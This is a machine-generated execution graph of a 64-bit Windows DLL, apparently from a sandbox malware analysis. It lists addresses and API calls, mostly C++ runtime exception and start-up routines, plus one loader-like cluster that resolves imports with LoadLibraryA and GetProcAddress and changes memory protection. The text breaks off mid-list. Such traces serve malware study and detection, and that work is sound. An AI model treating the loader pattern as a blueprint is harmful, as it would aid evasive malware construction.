                                                                                          Total number of Nodes:890
                                                                                          Total number of Limit Nodes:1
                                                                                          execution_graph 6499 7ffe1a457310 6500 7ffe1a457319 6499->6500 6501 7ffe1a457324 abort 6500->6501 6813 7ffe1a454f91 6814 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6813->6814 6815 7ffe1a454f9e 6814->6815 6816 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6815->6816 6818 7ffe1a454fa7 __CxxCallCatchBlock 6816->6818 6817 7ffe1a454fee RaiseException 6819 7ffe1a45500d 6817->6819 6818->6817 6820 7ffe1a460350 __CxxCallCatchBlock 14 API calls 6819->6820 6822 7ffe1a455015 6820->6822 6821 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6823 7ffe1a455051 6821->6823 6825 7ffe1a4529e0 __CxxCallCatchBlock 13 API calls 6822->6825 6827 7ffe1a45503e __CxxCallCatchBlock 6822->6827 6824 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6823->6824 6826 7ffe1a45505a 6824->6826 6825->6827 6828 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6826->6828 6827->6821 6829 7ffe1a455063 6828->6829 6830 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6829->6830 6831 7ffe1a455072 6830->6831 6044 7ffdfb3c2f20 6045 7ffdfb3c2f38 6044->6045 6050 7ffdfb3c3b16 6044->6050 6046 7ffdfb3c3a7e VirtualProtect VirtualProtect 6045->6046 6047 7ffdfb3c3a23 LoadLibraryA 6045->6047 6046->6050 6049 7ffdfb3c3a3d 6047->6049 6049->6045 6051 7ffdfb3c3a5c GetProcAddress 6049->6051 6050->6050 6051->6049 6052 7ffdfb3c3a73 6051->6052 6502 7ffe1a461d17 6505 7ffe1a452a50 6502->6505 6506 7ffe1a452a95 6505->6506 6507 7ffe1a452a68 6505->6507 6508 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6506->6508 6507->6506 6510 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6507->6510 6514 7ffe1a452aa5 6507->6514 6509 7ffe1a452a9a 6508->6509 6511 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6509->6511 6509->6514 6512 7ffe1a452a7d 6510->6512 6511->6514 6513 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6512->6513 6515 7ffe1a452a8a terminate 6513->6515 6515->6506 6053 7ffe1a460498 6062 7ffe1a456e48 6053->6062 6056 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6057 7ffe1a4604e7 6056->6057 6058 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6057->6058 6059 7ffe1a4604f0 6058->6059 6067 7ffe1a4549a0 6059->6067 6072 7ffe1a456e64 6062->6072 6065 7ffe1a456e5d 6065->6056 6066 7ffe1a456e56 abort 6066->6065 6102 7ffe1a45470c 6067->6102 6070 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6071 7ffe1a4549dc 6070->6071 6073 7ffe1a456e83 GetLastError 6072->6073 6074 7ffe1a456e51 6072->6074 6088 7ffe1a4571c4 6073->6088 6074->6065 6074->6066 6092 7ffe1a456fe4 6088->6092 6093 7ffe1a457028 6092->6093 6099 7ffe1a4570cf TlsGetValue 6092->6099 6094 7ffe1a457056 LoadLibraryExW 6093->6094 6095 7ffe1a457116 GetProcAddress 6093->6095 6093->6099 6096 7ffe1a4570f6 6094->6096 6097 7ffe1a457077 GetLastError 6094->6097 6095->6099 6096->6095 6098 7ffe1a45710d FreeLibrary 6096->6098 6097->6093 6100 7ffe1a457082 wcsncmp 6097->6100 6098->6095 6100->6093 6101 7ffe1a45709a LoadLibraryExW 6100->6101 6101->6093 6101->6096 6103 7ffe1a45473b 6102->6103 6104 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6103->6104 6105 7ffe1a454740 6104->6105 6110 7ffe1a4548a5 6105->6110 6112 7ffe1a454790 6105->6112 6116 7ffe1a454845 6105->6116 6106 7ffe1a4548ea 6106->6116 6147 7ffe1a4537f8 6106->6147 6107 7ffe1a454892 6140 7ffe1a45fb60 6107->6140 6110->6106 6110->6116 6144 7ffe1a4603b8 6110->6144 6111 7ffe1a45488b abort 6111->6107 6112->6107 6112->6111 6114 7ffe1a454837 6112->6114 6112->6116 6117 7ffe1a455464 6114->6117 6116->6070 6198 7ffe1a4603a4 6117->6198 6119 7ffe1a4554af 6120 7ffe1a4554ea 6119->6120 6121 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6119->6121 6122 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6120->6122 6123 7ffe1a4554d5 6121->6123 6124 7ffe1a4554ef 6122->6124 6125 7ffe1a4554e3 abort 6123->6125 6126 7ffe1a4554db 6123->6126 6124->6126 6127 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6124->6127 6125->6120 6128 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6126->6128 6129 7ffe1a4554fa 6127->6129 6135 7ffe1a45550e __CxxCallCatchBlock 6128->6135 6130 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6129->6130 6130->6126 6131 7ffe1a45572a 6132 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6131->6132 6133 7ffe1a45572f 6132->6133 6134 7ffe1a45573a 6133->6134 6136 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6133->6136 6204 7ffe1a460910 6134->6204 6135->6131 6201 7ffe1a4603cc 6135->6201 6136->6134 6141 7ffe1a45fb72 6140->6141 6142 7ffe1a455464 22 API calls 6141->6142 6143 7ffe1a45fb8d 6142->6143 6143->6116 6145 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6144->6145 6146 7ffe1a4603c1 6145->6146 6146->6106 6148 7ffe1a453855 6147->6148 6149 7ffe1a453874 6148->6149 6150 7ffe1a45385d 6148->6150 6152 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6149->6152 6151 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6150->6151 6161 7ffe1a453862 6151->6161 6153 7ffe1a453879 6152->6153 6155 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6153->6155 6153->6161 6154 7ffe1a453ca2 abort 6156 7ffe1a453ca9 6154->6156 6157 7ffe1a453884 6155->6157 6158 7ffe1a460910 DName::DName 8 API calls 6156->6158 6160 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6157->6160 6159 7ffe1a453cb5 6158->6159 6159->6116 6160->6161 6161->6154 6163 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6161->6163 6190 7ffe1a4539aa 6161->6190 6162 7ffe1a453c96 6166 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6162->6166 6164 7ffe1a453914 6163->6164 6164->6156 6169 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6164->6169 6165 7ffe1a453c5e 6165->6154 6165->6162 6254 7ffe1a453f60 6165->6254 6168 7ffe1a453c9b 6166->6168 6168->6154 6168->6156 6170 7ffe1a453924 6169->6170 6171 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6170->6171 6173 7ffe1a45392d 6171->6173 6172 7ffe1a453c30 6172->6162 6174 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6172->6174 6218 7ffe1a4603e4 6173->6218 6176 7ffe1a453c4a 6174->6176 6178 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6176->6178 6179 7ffe1a453c53 terminate 6178->6179 6179->6165 6180 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6181 7ffe1a45396a 6180->6181 6182 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6181->6182 6181->6190 6183 7ffe1a453976 6182->6183 6184 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6183->6184 6185 7ffe1a45397f 6184->6185 6221 7ffe1a455800 6185->6221 6187 7ffe1a4603b8 13 API calls 6187->6190 6190->6165 6190->6172 6190->6187 6232 7ffe1a454398 6190->6232 6246 7ffe1a453260 6190->6246 6193 7ffe1a4539a3 terminate 6193->6190 6195 7ffe1a453cc9 __CxxCallCatchBlock std::bad_alloc::bad_alloc 6270 7ffe1a456b10 6195->6270 6197 7ffe1a453cec 6199 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6198->6199 6200 7ffe1a4603ad 6199->6200 6200->6119 6202 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6201->6202 6203 7ffe1a4603da 6202->6203 6203->6135 6205 7ffe1a460919 6204->6205 6206 7ffe1a45574d 6205->6206 6207 7ffe1a460ae0 IsProcessorFeaturePresent 6205->6207 6206->6116 6208 7ffe1a460af8 6207->6208 6213 7ffe1a460bb4 RtlCaptureContext 6208->6213 6214 7ffe1a460bce RtlLookupFunctionEntry 6213->6214 6215 7ffe1a460be4 RtlVirtualUnwind 6214->6215 6216 7ffe1a460b0b 6214->6216 6215->6214 6215->6216 6217 7ffe1a460aa8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6216->6217 6219 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6218->6219 6220 7ffe1a45393f 6219->6220 6220->6154 6220->6180 6222 7ffe1a4558e7 abort 6221->6222 6225 7ffe1a45582b 6221->6225 6223 7ffe1a45398f 6223->6190 6228 7ffe1a4558f0 6223->6228 6224 7ffe1a4603b8 13 API calls 6224->6225 6225->6223 6225->6224 6226 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6225->6226 6275 7ffe1a454258 6225->6275 6226->6225 6229 7ffe1a45399b 6228->6229 6230 7ffe1a45590d Is_bad_exception_allowed 6228->6230 6229->6193 6229->6195 6230->6229 6231 7ffe1a4603a4 13 API calls Is_bad_exception_allowed 6230->6231 6231->6230 6233 7ffe1a4543c4 6232->6233 6245 7ffe1a454457 6232->6245 6234 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6233->6234 6235 7ffe1a4543cd 6234->6235 6236 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6235->6236 6237 7ffe1a4543e6 6235->6237 6235->6245 6236->6237 6238 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6237->6238 6240 7ffe1a454416 6237->6240 6237->6245 6238->6240 6239 7ffe1a4603b8 13 API calls 6241 7ffe1a45442a 6239->6241 6240->6239 6242 7ffe1a454443 6241->6242 6243 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6241->6243 6241->6245 6244 7ffe1a4603b8 13 API calls 6242->6244 6243->6242 6244->6245 6245->6190 6247 7ffe1a45329d 6246->6247 6248 7ffe1a4532c3 6247->6248 6289 7ffe1a4530c8 6247->6289 6249 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6248->6249 6251 7ffe1a4532d5 6249->6251 6298 7ffe1a46002c RtlUnwindEx 6251->6298 6255 7ffe1a453fb4 6254->6255 6256 7ffe1a45422e 6254->6256 6258 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6255->6258 6257 7ffe1a460910 DName::DName 8 API calls 6256->6257 6259 7ffe1a45423a 6257->6259 6260 7ffe1a453fb9 6258->6260 6259->6162 6261 7ffe1a453fce EncodePointer 6260->6261 6262 7ffe1a454020 6260->6262 6263 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6261->6263 6262->6256 6264 7ffe1a45424e abort 6262->6264 6267 7ffe1a454042 6262->6267 6265 7ffe1a453fde 6263->6265 6265->6262 6321 7ffe1a45f8dc 6265->6321 6267->6256 6268 7ffe1a4603a4 13 API calls Is_bad_exception_allowed 6267->6268 6269 7ffe1a453260 28 API calls 6267->6269 6268->6267 6269->6267 6271 7ffe1a456b2f 6270->6271 6272 7ffe1a456b7a RaiseException 6271->6272 6273 7ffe1a456b58 RtlPcToFileHeader 6271->6273 6272->6197 6274 7ffe1a456b70 6273->6274 6274->6272 6276 7ffe1a454285 6275->6276 6288 7ffe1a454314 6275->6288 6277 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6276->6277 6278 7ffe1a45428e 6277->6278 6279 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6278->6279 6280 7ffe1a4542a7 6278->6280 6278->6288 6279->6280 6281 7ffe1a4542d3 6280->6281 6282 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6280->6282 6280->6288 6283 7ffe1a4603b8 13 API calls 6281->6283 6282->6281 6284 7ffe1a4542e7 6283->6284 6285 7ffe1a454300 6284->6285 6286 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6284->6286 6284->6288 6287 7ffe1a4603b8 13 API calls 6285->6287 6286->6285 6287->6288 6288->6225 6290 7ffe1a4530eb 6289->6290 6301 7ffe1a452e1c 6290->6301 6292 7ffe1a4530fc 6293 7ffe1a453101 __AdjustPointer 6292->6293 6295 7ffe1a45313d __AdjustPointer 6292->6295 6294 7ffe1a453120 6293->6294 6297 7ffe1a4603b8 13 API calls 6293->6297 6294->6248 6295->6294 6296 7ffe1a4603b8 13 API calls 6295->6296 6296->6294 6297->6294 6299 7ffe1a460910 DName::DName 8 API calls 6298->6299 6300 7ffe1a453319 6299->6300 6300->6190 6302 7ffe1a452e49 6301->6302 6304 7ffe1a452e52 6301->6304 6303 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6302->6303 6303->6304 6305 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6304->6305 6312 7ffe1a452e71 6304->6312 6320 7ffe1a452ece __AdjustPointer 6304->6320 6305->6312 6306 7ffe1a452edc 6307 7ffe1a452efb 6306->6307 6308 7ffe1a452ef5 abort 6306->6308 6306->6320 6309 7ffe1a452f49 6307->6309 6310 7ffe1a452f43 abort 6307->6310 6307->6320 6308->6307 6311 7ffe1a4603b8 13 API calls 6309->6311 6316 7ffe1a452f58 6309->6316 6310->6309 6311->6316 6312->6306 6313 7ffe1a452ed6 abort 6312->6313 6312->6320 6313->6306 6314 7ffe1a452fd9 abort abort 6314->6320 6315 7ffe1a452f94 abort 6318 7ffe1a452f9a 6315->6318 6316->6315 6316->6318 6316->6320 6317 7ffe1a452fae 6317->6314 6317->6320 6318->6314 6318->6317 6319 7ffe1a4603b8 13 API calls 6318->6319 6319->6317 6320->6292 6322 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6321->6322 6323 7ffe1a45f908 6322->6323 6323->6262 6832 7ffe1a461b98 6833 7ffe1a460350 __CxxCallCatchBlock 14 API calls 6832->6833 6837 7ffe1a461bab 6833->6837 6834 7ffe1a461bea __CxxCallCatchBlock 6835 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6834->6835 6836 7ffe1a461bfe 6835->6836 6838 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6836->6838 6837->6834 6840 7ffe1a4529e0 __CxxCallCatchBlock 13 API calls 6837->6840 6839 7ffe1a461c0e 6838->6839 6840->6834 6516 7ffe1a455f00 6517 7ffe1a455f1a 6516->6517 6533 7ffe1a456017 6516->6533 6518 7ffe1a460350 __CxxCallCatchBlock 14 API calls 6517->6518 6519 7ffe1a455f1f 6518->6519 6521 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6519->6521 6551 7ffe1a455f94 __CxxCallCatchBlock 6519->6551 6520 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6522 7ffe1a455fa4 6520->6522 6523 7ffe1a455f28 6521->6523 6524 7ffe1a455ffe 6522->6524 6525 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6522->6525 6527 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6523->6527 6523->6551 6526 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6524->6526 6528 7ffe1a455fb5 6525->6528 6529 7ffe1a45600a 6526->6529 6530 7ffe1a455f39 6527->6530 6528->6524 6532 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6528->6532 6531 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6529->6531 6534 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6530->6534 6530->6551 6531->6533 6536 7ffe1a455fc4 6532->6536 6535 7ffe1a455f48 6534->6535 6537 7ffe1a455f6c 6535->6537 6539 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6535->6539 6538 7ffe1a455fe8 6536->6538 6541 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6536->6541 6540 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6537->6540 6537->6551 6538->6524 6542 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6538->6542 6543 7ffe1a455f5a 6539->6543 6544 7ffe1a455f7e 6540->6544 6545 7ffe1a455fd6 6541->6545 6542->6524 6543->6537 6547 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6543->6547 6546 7ffe1a4529e0 __CxxCallCatchBlock 13 API calls 6544->6546 6545->6538 6549 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6545->6549 6548 7ffe1a455f8b 6546->6548 6547->6537 6550 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6548->6550 6548->6551 6549->6538 6550->6551 6551->6520 6908 7ffe1a454c00 6911 7ffe1a456900 6908->6911 6910 7ffe1a454c22 6912 7ffe1a45690f free 6911->6912 6913 7ffe1a456918 6911->6913 6912->6913 6913->6910 6841 7ffe1a452b80 terminate 6842 7ffe1a456980 InterlockedFlushSList 6843 7ffe1a4569a5 6842->6843 6844 7ffe1a456991 free 6842->6844 6844->6843 6844->6844 6904 7ffe1a455c00 6905 7ffe1a455c33 6904->6905 6906 7ffe1a455c09 6904->6906 6906->6905 6907 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6906->6907 6907->6905 6914 7ffe1a460400 6915 7ffe1a460410 6914->6915 6916 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6915->6916 6917 7ffe1a46043a 6916->6917 6918 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6917->6918 6919 7ffe1a460447 6918->6919 6920 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6919->6920 6921 7ffe1a460450 6920->6921 6552 7ffe1a45570a 6555 7ffe1a4555c3 __CxxCallCatchBlock 6552->6555 6553 7ffe1a45572a 6554 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6553->6554 6556 7ffe1a45572f 6554->6556 6555->6553 6561 7ffe1a4603cc __FrameHandler3::FrameUnwindToEmptyState 13 API calls 6555->6561 6557 7ffe1a45573a 6556->6557 6558 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6556->6558 6559 7ffe1a460910 DName::DName 8 API calls 6557->6559 6558->6557 6560 7ffe1a45574d 6559->6560 6561->6555 6925 7ffe1a461c1e 6928 7ffe1a4552a8 6925->6928 6929 7ffe1a455224 13 API calls 6928->6929 6930 7ffe1a4552bd 6929->6930 6931 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6930->6931 6932 7ffe1a4552c8 6930->6932 6931->6932 6324 7ffe1a4560a0 6327 7ffe1a456870 6324->6327 6328 7ffe1a4560c9 6327->6328 6329 7ffe1a456891 6327->6329 6329->6328 6330 7ffe1a4568a6 malloc 6329->6330 6331 7ffe1a4568d5 free 6330->6331 6332 7ffe1a4568b8 strcpy_s 6330->6332 6331->6328 6332->6331 6562 7ffe1a452b20 6563 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6562->6563 6564 7ffe1a452b29 6563->6564 6933 7ffe1a45f420 6934 7ffe1a45f670 __GSHandlerCheck_SEH RtlUnwindEx 6933->6934 6936 7ffe1a45f435 6934->6936 6935 7ffe1a45f461 6936->6935 6937 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6936->6937 6938 7ffe1a45f44d 6937->6938 6939 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6938->6939 6940 7ffe1a45f456 terminate 6939->6940 6940->6935 6941 7ffe1a45662a 6942 7ffe1a45663b 6941->6942 6943 7ffe1a456b10 2 API calls 6942->6943 6944 7ffe1a45664c 6943->6944 6945 7ffe1a45667a 6944->6945 6946 7ffe1a4566bc RtlPcToFileHeader 6944->6946 6947 7ffe1a4566da FindMITargetTypeInstance 6944->6947 6946->6947 6947->6945 6948 7ffe1a456b10 2 API calls 6947->6948 6949 7ffe1a4567b4 6948->6949 6950 7ffe1a456805 6949->6950 6951 7ffe1a4567cb 6949->6951 6954 7ffe1a456b10 2 API calls 6950->6954 6952 7ffe1a4567da RtlPcToFileHeader 6951->6952 6955 7ffe1a4567ef 6951->6955 6952->6955 6953 7ffe1a4567ff 6954->6955 6955->6953 6956 7ffe1a456b10 2 API calls 6955->6956 6957 7ffe1a45684a 6956->6957 6958 7ffe1a456b10 2 API calls 6957->6958 6959 7ffe1a45686d 6958->6959 6333 7ffe1a4530a9 abort 6334 7ffe1a4530b0 6333->6334 6963 7ffe1a461dd2 6964 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6963->6964 6965 7ffe1a461dea 6964->6965 6966 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6965->6966 6967 7ffe1a461e05 6966->6967 6968 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6967->6968 6969 7ffe1a461e19 6968->6969 6970 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6969->6970 6971 7ffe1a461e5b 6970->6971 6848 7ffe1a454b54 6849 7ffe1a456870 3 API calls 6848->6849 6850 7ffe1a454b7d 6849->6850 6335 7ffe1a455e50 6343 7ffe1a455e62 6335->6343 6352 7ffe1a455ec0 6335->6352 6336 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6338 7ffe1a455ed5 6336->6338 6340 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6338->6340 6341 7ffe1a455edd 6340->6341 6345 7ffe1a455ee8 6341->6345 6348 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6341->6348 6342 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6346 7ffe1a455ea6 6342->6346 6344 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6343->6344 6347 7ffe1a455e91 6343->6347 6343->6352 6344->6347 6349 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6346->6349 6353 7ffe1a460310 6347->6353 6348->6345 6350 7ffe1a455eb3 6349->6350 6351 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6350->6351 6351->6352 6352->6336 6354 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6353->6354 6355 7ffe1a460321 6354->6355 6356 7ffe1a46032c 6355->6356 6357 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6355->6357 6358 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6356->6358 6357->6356 6359 7ffe1a455ea1 6358->6359 6359->6342 6360 7ffe1a455c50 6361 7ffe1a455ddb 6360->6361 6365 7ffe1a455c83 6360->6365 6362 7ffe1a460910 DName::DName 8 API calls 6361->6362 6363 7ffe1a455e29 6362->6363 6364 7ffe1a455e05 6364->6361 6366 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6364->6366 6367 7ffe1a455cb2 6365->6367 6369 7ffe1a455ddf 6365->6369 6366->6361 6367->6361 6368 7ffe1a455cf3 6367->6368 6370 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6367->6370 6371 7ffe1a4603e4 13 API calls 6368->6371 6369->6364 6372 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6369->6372 6373 7ffe1a455ce4 6370->6373 6374 7ffe1a455d00 6371->6374 6372->6364 6373->6361 6376 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6373->6376 6375 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6374->6375 6377 7ffe1a455d05 6375->6377 6376->6368 6378 7ffe1a455d1a RtlPcToFileHeader 6377->6378 6379 7ffe1a455d2d 6377->6379 6378->6379 6380 7ffe1a4603cc __FrameHandler3::FrameUnwindToEmptyState 13 API calls 6379->6380 6381 7ffe1a455d35 6380->6381 6382 7ffe1a4603b8 13 API calls 6381->6382 6383 7ffe1a455d4c 6382->6383 6384 7ffe1a4603b8 13 API calls 6383->6384 6387 7ffe1a455d65 6384->6387 6385 7ffe1a4603cc __FrameHandler3::FrameUnwindToEmptyState 13 API calls 6385->6361 6386 7ffe1a4603b8 13 API calls 6386->6387 6387->6386 6388 7ffe1a455d9b 6387->6388 6390 7ffe1a455da0 6387->6390 6389 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6388->6389 6389->6390 6390->6385 6391 7ffe1a454c50 6392 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6391->6392 6393 7ffe1a454c85 6392->6393 6394 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6393->6394 6395 7ffe1a454c93 6394->6395 6396 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6395->6396 6397 7ffe1a454cd7 6396->6397 6398 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6397->6398 6399 7ffe1a454ce0 6398->6399 6400 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6399->6400 6401 7ffe1a454ce9 6400->6401 6402 7ffe1a460310 _CreateFrameInfo 13 API calls 6401->6402 6403 7ffe1a454cfb 6402->6403 6404 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6403->6404 6405 7ffe1a454d19 __CxxCallCatchBlock 6403->6405 6404->6405 6414 7ffe1a460350 6405->6414 6407 7ffe1a454df3 __CxxCallCatchBlock 6408 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6407->6408 6409 7ffe1a454e06 6408->6409 6411 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6409->6411 6413 7ffe1a454e0f 6411->6413 6415 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6414->6415 6416 7ffe1a460362 6415->6416 6417 7ffe1a460387 abort 6416->6417 6418 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6416->6418 6419 7ffe1a46038e 6417->6419 6420 7ffe1a46036d 6418->6420 6421 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6419->6421 6420->6417 6420->6419 6422 7ffe1a454dca 6421->6422 6422->6407 6423 7ffe1a4529e0 6422->6423 6424 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6423->6424 6425 7ffe1a4529ee 6424->6425 6425->6407 6972 7ffe1a4605d0 6973 7ffe1a460558 6972->6973 6974 7ffe1a4605ec 6972->6974 6976 7ffe1a460564 6973->6976 6977 7ffe1a46059a 6973->6977 7007 7ffe1a4609fc 6974->7007 6978 7ffe1a460584 6976->6978 6979 7ffe1a460569 6976->6979 6986 7ffe1a460578 6977->6986 7001 7ffe1a456d04 6977->7001 6993 7ffe1a456cb0 6978->6993 6982 7ffe1a46056e 6979->6982 6983 7ffe1a46057d 6979->6983 6982->6986 6987 7ffe1a456cf4 6982->6987 6990 7ffe1a456ce0 6983->6990 7010 7ffe1a456e00 6987->7010 6991 7ffe1a456e64 __CxxCallCatchBlock 12 API calls 6990->6991 6992 7ffe1a456ce9 6991->6992 6992->6986 6994 7ffe1a456cb9 _DllMainCRTStartup 6993->6994 7023 7ffe1a456d20 6994->7023 6997 7ffe1a456cc2 6997->6986 7002 7ffe1a456d0c 7001->7002 7003 7ffe1a456d16 7001->7003 7049 7ffe1a456fc0 7002->7049 7003->6986 7006 7ffe1a456d84 __vcrt_initialize_locks DeleteCriticalSection 7006->7003 7008 7ffe1a460a93 7007->7008 7009 7ffe1a460a1f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7007->7009 7008->6973 7009->7008 7011 7ffe1a456cfd 7010->7011 7012 7ffe1a456e11 7010->7012 7011->6986 7013 7ffe1a4571c4 __vcrt_getptd_noinit 7 API calls 7012->7013 7014 7ffe1a456e16 7013->7014 7018 7ffe1a45720c 7014->7018 7017 7ffe1a456e37 free 7017->7011 7019 7ffe1a456fe4 __vcrt_FlsAlloc 6 API calls 7018->7019 7020 7ffe1a45723a 7019->7020 7021 7ffe1a456e26 7020->7021 7022 7ffe1a45724c TlsSetValue 7020->7022 7021->7011 7021->7017 7022->7021 7025 7ffe1a456d28 7023->7025 7026 7ffe1a456d59 7025->7026 7027 7ffe1a456cbe 7025->7027 7040 7ffe1a457260 7025->7040 7028 7ffe1a456d84 __vcrt_initialize_locks DeleteCriticalSection 7026->7028 7027->6997 7029 7ffe1a456f78 7027->7029 7028->7027 7045 7ffe1a457134 7029->7045 7041 7ffe1a456fe4 __vcrt_FlsAlloc 6 API calls 7040->7041 7042 7ffe1a457296 7041->7042 7043 7ffe1a4572ab InitializeCriticalSectionAndSpinCount 7042->7043 7044 7ffe1a4572a0 7042->7044 7043->7044 7044->7025 7046 7ffe1a456fe4 __vcrt_FlsAlloc 6 API calls 7045->7046 7047 7ffe1a457159 TlsAlloc 7046->7047 7050 7ffe1a456fcf 7049->7050 7052 7ffe1a456d11 7049->7052 7053 7ffe1a45717c 7050->7053 7052->7006 7054 7ffe1a456fe4 __vcrt_FlsAlloc 6 API calls 7053->7054 7055 7ffe1a4571a3 TlsFree 7054->7055 6426 7ffe1a452240 RtlUnwind 6427 7ffe1a454e40 6428 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6427->6428 6429 7ffe1a454e8d 6428->6429 6430 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6429->6430 6431 7ffe1a454e9b 6430->6431 6432 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6431->6432 6433 7ffe1a454ef4 6432->6433 6434 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6433->6434 6435 7ffe1a454efd 6434->6435 6436 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6435->6436 6437 7ffe1a454f06 6436->6437 6438 7ffe1a460310 _CreateFrameInfo 13 API calls 6437->6438 6439 7ffe1a454f1b 6438->6439 6440 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6439->6440 6441 7ffe1a454f39 6439->6441 6440->6441 6442 7ffe1a454f74 abort 6441->6442 6443 7ffe1a454f6d 6441->6443 6442->6443 6444 